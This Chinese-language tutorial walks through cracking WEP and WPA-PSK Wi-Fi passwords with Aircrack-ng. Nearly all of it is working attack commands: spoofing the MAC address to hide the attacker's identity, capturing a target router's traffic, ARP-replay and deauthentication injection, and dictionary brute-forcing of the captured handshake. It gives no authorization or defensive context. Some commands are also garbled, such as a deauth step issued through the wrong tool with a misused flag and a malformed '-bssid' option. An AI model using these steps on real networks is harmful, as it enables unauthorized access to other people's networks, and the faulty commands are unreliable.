破解WEP和WPA加密的无线网络

    今天讲讲Aircrack-ng,这是一个基于破解无线802.11协议的wep及wpa-psk加密的工具。补充一点，这种破解方法是在网卡的基础上进行的。

破解wep加密的无线网络:现在命令行输入airmon-ng

查看当前系统的无线网络接口，假设这个无线接口为wlan2。下一步我们停止这个接口，然后设置mac掩码，隐藏真实的mac地址。停止命令为

airmon-ng stop wlan2

修改mac地址的命令为

macchanger --mac xxx掩码地址 wlan2

最后启动无线接口就能查看现在的接口信息，可以看见当前监听模式是启用的，映射网络接口是mon0

airmon-ng start wlan2

接下来是用airodump-ng命令来查看附近的无线网络

airodump-ng wlan2

这个查询是动态的，ctrl+c可以停止。可以看见里面有很多参数，其中需要记住的几个是bssid为无线ip地址，enc为加密方式，essid为ssid号，后面需要使用，还有就是ch信道号。

接下来就选择一个bssid地址攻击，需要用到airodump-ng，其中参数-c对应信道号，-w对应捕捉到数据的存储地址文件。

airodump-ng -c 信道号 -w 文件名 -bssid 目标mac地址 mon0

现在可以打开一个新的终端窗口来进行arp协助抓包，用到一个新的命令aireplay-ng，首先进行握手

aireplay-ng -1 0 -a  目标mac -h 我们设置的mac掩码-e essid值 mon0

再发送一些流量给无线路由器，使增强抓包力度

aireplay-ng -3 -b 目标mac地址 -h 我们设置的mac掩码 mon0

此时可以看见抓取的无线报文数目，等到两万作用差不多就可以开始破解了。

aircrack命令破解密码

aircrack-ng -b 目标mac 抓包文件名.cap

等待key found就可以获得密码。

破解wpa加密的无线网络:

抓包步骤与wep加密破解类似，流量攻击我们也可以采用deauth攻击。

airodump-ng --deauth 1 -a 目标mac地址 -c mac掩码 mon0

由于wpa加密较wep更加强力，所以我们需要准备一个字典，再使用aircrack命令暴力破解。

aircrack-ng -w 字典文件地址 抓到的cap包

待key found，密码就能破解。